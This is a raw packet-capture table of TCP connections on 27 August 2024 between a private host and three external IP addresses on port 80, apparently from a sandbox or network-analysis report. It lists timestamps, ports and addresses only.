Aug 27, 2024 14:21:45.838891983 CEST	80	52522	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:46.357636929 CEST	80	52521	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:46.359596014 CEST	52521	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:46.362217903 CEST	52521	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:46.362222910 CEST	52523	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:46.374078989 CEST	80	52523	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:46.375670910 CEST	52523	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:46.375746012 CEST	52523	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:46.375873089 CEST	80	52521	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:46.375973940 CEST	52521	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:46.382466078 CEST	80	52523	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:47.087800980 CEST	80	52523	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:47.087856054 CEST	52523	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:47.203744888 CEST	52523	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:47.203986883 CEST	52524	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:47.208936930 CEST	80	52523	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:47.208951950 CEST	80	52524	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:47.208998919 CEST	52523	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:47.209045887 CEST	52524	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:47.209150076 CEST	52524	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:47.216033936 CEST	80	52524	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:47.479408979 CEST	80	52522	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:47.479464054 CEST	52522	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:47.479546070 CEST	52522	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:47.484461069 CEST	80	52522	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:47.595592976 CEST	52525	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:47.600610018 CEST	80	52525	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:47.603652000 CEST	52525	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:47.607744932 CEST	52525	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:47.623303890 CEST	80	52525	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:48.029572964 CEST	52517	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:48.029587030 CEST	52525	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:48.029726982 CEST	52524	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:48.032407999 CEST	52526	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:48.033382893 CEST	52527	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:48.036762953 CEST	80	52524	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:48.038878918 CEST	80	52526	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:48.038893938 CEST	80	52527	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:48.038979053 CEST	52524	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:48.038988113 CEST	52526	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:48.039069891 CEST	52527	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:48.041440010 CEST	52527	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:48.041446924 CEST	52526	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:48.052166939 CEST	80	52527	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:48.052176952 CEST	80	52526	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:48.487488031 CEST	52528	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:48.492450953 CEST	80	52528	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:48.492552042 CEST	52528	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:48.539526939 CEST	52528	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:48.544538021 CEST	80	52528	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:48.731930017 CEST	80	52527	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:48.731987953 CEST	52527	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:48.993010044 CEST	52527	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:48.993371964 CEST	52529	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.000951052 CEST	80	52527	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:49.000968933 CEST	80	52529	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:49.001043081 CEST	52527	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.001096964 CEST	52529	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.016844988 CEST	52529	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.021637917 CEST	80	52529	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:49.643677950 CEST	80	52526	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:49.645623922 CEST	52526	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:49.645623922 CEST	52526	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:49.650516033 CEST	80	52526	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:49.729665041 CEST	80	52529	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:49.734692097 CEST	52529	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.741426945 CEST	52529	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.745520115 CEST	52530	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.747437000 CEST	80	52529	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:49.748054028 CEST	52529	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.750638008 CEST	80	52530	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:49.750766993 CEST	52530	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.750792027 CEST	52531	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:49.750879049 CEST	52530	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:49.755842924 CEST	80	52531	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:49.755855083 CEST	80	52530	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:49.757693052 CEST	52531	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:49.757693052 CEST	52531	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:49.762538910 CEST	80	52531	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:50.431438923 CEST	80	52530	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:50.431531906 CEST	52530	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:50.548888922 CEST	52530	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:50.549226046 CEST	52532	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:50.554050922 CEST	80	52532	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:50.554116964 CEST	52532	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:50.554274082 CEST	52532	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:50.554320097 CEST	80	52530	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:50.554373980 CEST	52530	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:50.559228897 CEST	80	52532	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:51.232770920 CEST	80	52532	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:51.232929945 CEST	52532	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:51.235421896 CEST	52532	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:51.235716105 CEST	52533	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:51.240611076 CEST	80	52532	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:51.240668058 CEST	80	52533	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:51.240673065 CEST	52532	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:51.240746021 CEST	52533	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:51.240859985 CEST	52533	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:51.245635033 CEST	80	52533	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:51.383388996 CEST	80	52531	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:51.383452892 CEST	52531	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:51.385854959 CEST	52531	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:51.392106056 CEST	80	52531	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:51.467781067 CEST	52534	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:51.474033117 CEST	80	52534	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:51.474092960 CEST	52534	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:51.475295067 CEST	52534	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:51.481581926 CEST	80	52534	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:52.017420053 CEST	80	52533	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:52.017551899 CEST	52533	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.045253992 CEST	52534	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:52.045288086 CEST	52533	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.045289040 CEST	52528	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:52.048536062 CEST	52535	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:52.051018000 CEST	80	52533	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:52.051076889 CEST	52533	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.053386927 CEST	80	52535	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:52.053519964 CEST	52535	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:52.053585052 CEST	52535	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:52.058305025 CEST	80	52535	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:52.125243902 CEST	52536	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.130125046 CEST	80	52536	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:52.130192995 CEST	52536	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.130348921 CEST	52536	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.135297060 CEST	80	52536	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:52.156543970 CEST	52537	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:52.161365986 CEST	80	52537	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:52.161499023 CEST	52537	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:52.161607027 CEST	52537	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:52.166570902 CEST	80	52537	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:52.812073946 CEST	80	52536	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:52.812135935 CEST	52536	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.815578938 CEST	52536	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.815959930 CEST	52538	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.821572065 CEST	80	52536	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:52.821593046 CEST	80	52538	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:52.821628094 CEST	52536	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.821685076 CEST	52538	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.821830034 CEST	52538	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:52.828747034 CEST	80	52538	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:53.531466007 CEST	80	52538	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:53.536639929 CEST	52538	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:53.641385078 CEST	52539	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:53.641396999 CEST	52538	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:53.646353006 CEST	80	52539	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:53.646595001 CEST	80	52538	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:53.647607088 CEST	52539	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:53.647615910 CEST	52538	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:53.653549910 CEST	52539	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:53.658360958 CEST	80	52539	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:53.772787094 CEST	80	52537	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:53.773624897 CEST	52537	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:53.773624897 CEST	52537	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:53.775960922 CEST	52540	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:53.778562069 CEST	80	52537	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:53.780992985 CEST	80	52540	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:53.785728931 CEST	52540	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:53.785728931 CEST	52540	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:53.790549040 CEST	80	52540	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:54.333448887 CEST	80	52539	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:54.337635040 CEST	52539	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:54.382714987 CEST	52539	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:54.387876034 CEST	80	52539	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:54.390032053 CEST	52539	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:54.390119076 CEST	52541	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:54.395545959 CEST	80	52541	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:54.397587061 CEST	52541	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:54.398087978 CEST	52541	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:54.402839899 CEST	80	52541	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:55.104391098 CEST	80	52541	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:55.104556084 CEST	52541	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.220351934 CEST	52541	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.220834017 CEST	52542	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.225621939 CEST	80	52541	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:55.225635052 CEST	80	52542	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:55.225672007 CEST	52541	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.225699902 CEST	52542	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.225862026 CEST	52542	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.230706930 CEST	80	52542	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:55.377377033 CEST	80	52540	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:55.377437115 CEST	52540	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:55.377497911 CEST	52540	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:55.382354975 CEST	80	52540	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:55.484920025 CEST	52543	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:55.489725113 CEST	80	52543	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:55.489815950 CEST	52543	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:55.489911079 CEST	52543	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:55.494714975 CEST	80	52543	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:55.932631016 CEST	80	52542	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:55.932696104 CEST	52542	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.935311079 CEST	52542	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.935324907 CEST	52544	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.940160990 CEST	80	52544	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:55.940269947 CEST	52544	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.940418005 CEST	80	52542	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:55.940453053 CEST	52544	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.940534115 CEST	52542	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:55.945202112 CEST	80	52544	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:56.060842037 CEST	52544	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:56.060947895 CEST	52543	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:56.061016083 CEST	52535	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:56.063440084 CEST	52545	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:56.068335056 CEST	80	52545	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:56.068449020 CEST	52545	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:56.068532944 CEST	52545	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:56.073246002 CEST	80	52545	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:56.173022032 CEST	52546	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:56.173180103 CEST	52547	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:56.177886963 CEST	80	52546	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:56.177963018 CEST	80	52547	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:56.178054094 CEST	52546	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:56.178132057 CEST	52547	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:56.178492069 CEST	52546	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:56.178504944 CEST	52547	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:56.183516979 CEST	80	52546	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:56.183559895 CEST	80	52547	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:56.863383055 CEST	80	52547	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:56.863435984 CEST	52547	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:56.867342949 CEST	52547	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:56.872127056 CEST	80	52547	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:57.210589886 CEST	80	52547	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:57.210670948 CEST	52547	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:57.362957001 CEST	52547	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:57.363297939 CEST	52548	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:57.368139982 CEST	80	52547	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:57.368154049 CEST	80	52548	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:57.368185997 CEST	52547	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:57.368242979 CEST	52548	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:57.368380070 CEST	52548	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:57.373199940 CEST	80	52548	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:57.659003973 CEST	80	52545	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:57.661640882 CEST	52545	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:57.661698103 CEST	52545	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:57.666631937 CEST	80	52545	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:57.769550085 CEST	52549	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:57.774580956 CEST	80	52549	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:57.777632952 CEST	52549	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:57.781541109 CEST	52549	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:57.786479950 CEST	80	52549	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:58.133621931 CEST	80	52548	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:58.133784056 CEST	52548	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.135927916 CEST	52548	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.136274099 CEST	52550	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.140922070 CEST	80	52548	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:58.141001940 CEST	52548	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.141047955 CEST	80	52550	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:58.141191959 CEST	52550	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.145576000 CEST	52550	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.150458097 CEST	80	52550	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:58.836081028 CEST	80	52550	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:58.836131096 CEST	52550	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.954524040 CEST	52550	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.954929113 CEST	52551	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.959748030 CEST	80	52551	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:58.959811926 CEST	52551	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.959867954 CEST	80	52550	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:58.959912062 CEST	52550	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.959953070 CEST	52551	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:58.964761019 CEST	80	52551	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:59.395780087 CEST	80	52549	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:59.395875931 CEST	52549	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:59.395930052 CEST	52549	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:59.398247004 CEST	52552	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:59.400724888 CEST	80	52549	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:59.403062105 CEST	80	52552	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:59.403127909 CEST	52552	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:59.403249979 CEST	52552	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:59.413749933 CEST	80	52552	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:59.698618889 CEST	80	52551	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:59.698762894 CEST	52551	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:59.701543093 CEST	52551	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:59.701572895 CEST	52553	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:59.706402063 CEST	80	52553	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:59.706598043 CEST	80	52551	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:59.706697941 CEST	52551	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:59.706698895 CEST	52553	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:59.706916094 CEST	52553	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:59.711678982 CEST	80	52553	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:00.076576948 CEST	52546	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:00.076581001 CEST	52552	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:00.076653957 CEST	52553	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.079797983 CEST	52554	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:00.084695101 CEST	80	52554	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:00.085508108 CEST	52554	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:00.085508108 CEST	52554	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:00.090373039 CEST	80	52554	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:00.188697100 CEST	52556	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.189116001 CEST	52555	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:00.193552017 CEST	80	52556	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:00.193727970 CEST	52556	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.194031000 CEST	52556	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.194051981 CEST	80	52555	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:00.194142103 CEST	52555	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:00.194307089 CEST	52555	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:00.204581976 CEST	80	52556	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:00.205049038 CEST	80	52555	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:00.933495998 CEST	80	52556	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:00.933548927 CEST	52556	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.936845064 CEST	52556	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.937207937 CEST	52557	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.949520111 CEST	80	52557	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:00.949582100 CEST	52557	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.949764013 CEST	52557	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.949924946 CEST	80	52556	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:00.949970007 CEST	52556	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:00.954746962 CEST	80	52557	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:01.657428980 CEST	80	52557	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:01.659663916 CEST	52557	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:01.766448021 CEST	52557	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:01.766448021 CEST	52558	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:01.771332979 CEST	80	52558	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:01.771887064 CEST	80	52557	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:01.773616076 CEST	52557	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:01.773616076 CEST	52558	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:01.773786068 CEST	52558	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:01.778613091 CEST	80	52558	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:01.798491955 CEST	80	52555	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:01.798599005 CEST	52555	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:01.798683882 CEST	52555	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:01.803524017 CEST	80	52555	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:01.803550005 CEST	52559	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:01.808451891 CEST	80	52559	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:01.808525085 CEST	52559	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:01.808921099 CEST	52559	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:01.813713074 CEST	80	52559	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:02.454500914 CEST	80	52558	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:02.457631111 CEST	52558	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:02.460206032 CEST	52558	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:02.460210085 CEST	52560	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:02.465046883 CEST	80	52560	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:02.465430021 CEST	80	52558	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:02.468377113 CEST	52558	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:02.468378067 CEST	52560	80	192.168.2.6	185.208.158.116
